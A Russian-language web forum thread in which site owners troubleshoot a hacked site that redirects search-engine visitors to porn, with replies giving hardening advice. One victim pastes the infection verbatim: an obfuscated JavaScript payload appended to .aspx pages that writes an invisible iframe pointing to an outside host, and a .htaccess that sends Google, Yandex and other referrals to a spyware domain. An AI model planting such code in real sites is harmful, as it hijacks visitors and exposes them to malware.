есть сайт (не сочтите за каку-либо рекламу но указание сайта обязательно для проведения проверки)
так вот, есть сайт www.in-english.kiev.ua
захожу на него нормально
но если пытаюсь зайти по ссылке из результатов поиска в Google меня сразу редиректит на всякое порно
в чем подвох
заявку в гугле оставил, но они что-то не шевелятся отвечать
может кто сталкивался с таким?
Буду рад если поделитесь опытом борьбы с такой напастью
Здравствуйте, Упщк, Вы писали:
У>Народ, объясните мне как такое может быть!
У>есть сайт (не сочтите за каку-либо рекламу но указание сайта обязательно для проведения проверки) У>так вот, есть сайт www.in-english.kiev.ua У>захожу на него нормально
У>но если пытаюсь зайти по ссылке из результатов поиска в Google меня сразу редиректит на всякое порно
У>в чем подвох У>заявку в гугле оставил, но они что-то не шевелятся отвечать
У>может кто сталкивался с таким?
У>Буду рад если поделитесь опытом борьбы с такой напастью
смотрим, чем обмениваются клиент с сервером и видим:
(особенно тщательно смотри на выделенное)
[skipped, ибо дальше неинтересная серия редиректов до порнухи]
То есть на твоем сайте делается 302ой редирект до порно-распределителя.
Смотри внимательно в .htaccess (или где там у тебя редиректы хандлятся).
Похоже, кто-то подсадил тебе на сервер троянскую коняжку, которая и редиректит налево (видимо при условии, что в реферере гугл)
Здравствуйте, Упщк, Вы писали:
У>почистил .htaccess и все стало ок!!!!
У>в .htaccess было:
[skipped]
что и требовалось доказать
проверь на всякий пожарный права на .htaccess;
убедись, что в конфиге apache все насроено так, чтобы этот файл никому ни при каких условиях не был виден;
проверь свои скрипты (особенно, которые занимаются аплоадом файла), что они не дают возможности грузить на сервер файло, которое может на нем исполниться (ну там .php, .cgi и т.п.);
проверь, что php не может исполнять файлы с расширением не .php
как-то ведь тебе .htaccess поправили (а может и загрузили через дыру).
типичная атака — это зааплоалить через дыру на сервер .php или даже .jpg, с кодом, который либо грузит в нужное место нужный файл, либо "достает" нужный файл с нужного места, либо с другим хитрожопым кодом. Потом злоумышленнику остается только запустить заргуженный "троян" и воспользоваться его возможностями.
Что интересно, запись на диск в корневом каталоге запрещена, разрешено лишь чтение и выполнение файлов. Поэтому не ясно каким образом им удалось записать инфу в страницы .aspx, а также файл .htaccess. Видимо где-то дыра в коде, буду искать.
Здравствуйте, Аноним, Вы писали:
А>Здравствуйте, Упщк, Вы писали:
У>>Народ, объясните мне как такое может быть!
А>Подцепил эту же заразу на Windows хостинге. Сайт крутится на ASP.NET, его пытались заразить путем дописывания в конец .aspx страниц вот этого скрипта:
А><html><body><script type="text/javascript">var XiLgdMoRSAbuUBAgpMkf = "uKNMv60uKNMv105uKNMv102uKNMv114uKNMv97uKNMv109uKNMv101uKNMv32uKNMv119uKNMv105uKNMv100uKNMv116uKNMv104uKNMv61uKNMv34uKNMv52uKNMv56uKNMv48uKNMv34uKNMv32uKNMv104uKNMv101uKNMv105uKNMv103uKNMv104uKNMv116uKNMv61uKNMv34uKNMv54uKNMv48uKNMv34uKNMv32uKNMv115uKNMv114uKNMv99uKNMv61uKNMv34uKNMv104uKNMv116uKNMv116uKNMv112uKNMv58uKNMv47uKNMv47uKNMv120uKNMv98uKNMv120uKNMv46uKNMv116uKNMv119uKNMv47uKNMv105uKNMv110uKNMv46uKNMv99uKNMv103uKNMv105uKNMv63uKNMv51uKNMv34uKNMv32uKNMv115uKNMv116uKNMv121uKNMv108uKNMv101uKNMv61uKNMv34uKNMv98uKNMv111uKNMv114uKNMv100uKNMv101uKNMv114uKNMv58uKNMv48uKNMv112uKNMv120uKNMv59uKNMv32uKNMv112uKNMv111uKNMv115uKNMv105uKNMv116uKNMv105uKNMv111uKNMv110uKNMv58uKNMv114uKNMv101uKNMv108uKNMv97uKNMv116uKNMv105uKNMv118uKNMv101uKNMv59uKNMv32uKNMv116uKNMv111uKNMv112uKNMv58uKNMv48uKNMv112uKNMv120uKNMv59uKNMv32uKNMv108uKNMv101uKNMv102uKNMv116uKNMv58uKNMv45uKNMv53uKNMv48uKNMv48uKNMv112uKNMv120uKNMv59uKNMv32uKNMv111uKNMv112uKNMv97uKNMv99uKNMv105uKNMv116uKNMv121uKNMv58uKNMv48uKNMv59uKNMv32uKNMv102uKNMv105uKNMv108uKNMv116uKNMv101uKNMv114uKNMv58uKNMv112uKNMv114uKNMv111uKNMv103uKNMv105uKNMv100uKNMv58uKNMv68uKNMv88uKNMv73uKNMv109uKNMv97uKNMv103uKNMv101uKNMv84uKNMv114uKNMv97uKNMv110uKNMv115uKNMv102uKNMv111uKNMv114uKNMv109uKNMv46uKNMv77uKNMv105uKNMv99uKNMv114uKNMv111uKNMv115uKNMv111uKNMv102uKNMv116uKNMv46uKNMv65uKNMv108uKNMv112uKNMv104uKNMv97uKNMv40uKNMv111uKNMv112uKNMv97uKNMv99uKNMv105uKNMv116uKNMv121uKNMv61uKNMv48uKNMv41uKNMv59uKNMv32uKNMv45uKNMv109uKNMv111uKNMv122uKNMv45uKNMv111uKNMv112uKNMv97uKNMv99uKNMv105uKNMv116uKNMv121uKNMv58uKNMv48uKNMv34uKNMv62uKNMv60uKNMv47uKNMv105uKNMv102uKNMv114uKNMv97uKNMv109uKNMv101uKNMv62";var ChBcyUOSVHTsqfYTsNlK = XiLgdMoRSAbuUBAgpMkf.split("uKNMv");var ONFiOFOESykVglxfGMyb = "";for (var URUKxtepGQzUdEDsKRwd=1; URUKxtepGQzUdEDsKRwd<ChBcyUOSVHTsqfYTsNlK.length; URUKxtepGQzUdEDsKRwd++){ONFiOFOESykVglxfGMyb+=String.fromCharCode(ChBcyUOSVHTsqfYTsNlK[URUKxtepGQzUdEDsKRwd]);}document.write(ONFiOFOESykVglxfGMyb)</script></body></html>
А>В корневой каталог был добавлен файл .htaccess следующего содержания:
А>RewriteEngine On А>RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] А>RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] А>RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] А>RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR] А>RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
А>RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
А>RewriteCond %{HTTP_REFERER} .*ya.*$ [NC] А>RewriteRule .* http://spywarepc.info/0/go.php?sid=2 [R,L]
А>Что интересно, запись на диск в корневом каталоге запрещена, разрешено лишь чтение и выполнение файлов. Поэтому не ясно каким образом им удалось записать инфу в страницы .aspx, а также файл .htaccess. Видимо где-то дыра в коде, буду искать.
А>Всем честным людям удачи!
Если есть где закачка файлов, то вполне возможно. В папке, где идёт загрузка файлов скопируй htaccess с ограничением на формат загрёжаемых файлов (это можно обойти), лучшее вообще вынеси за предели домена в отдельную папку.
Либо второй вариант — это ftp — прописаны напрямую логин и пароль в FAR к примнру что в принципе вообще не сдожно сделать.
Здравствуйте, <Аноним>, Вы писали:
А>Здравствуйте, Упщк, Вы писали:
У>>Народ, объясните мне как такое может быть!
А>Подцепил эту же заразу на Windows хостинге. Сайт крутится на ASP.NET, его пытались заразить путем дописывания в конец .aspx страниц вот этого скрипта:
А>В корневой каталог был добавлен файл .htaccess следующего содержания:
или IIS научился понимать .htaccess, или месье на windows хостинге использует апач с моно ?!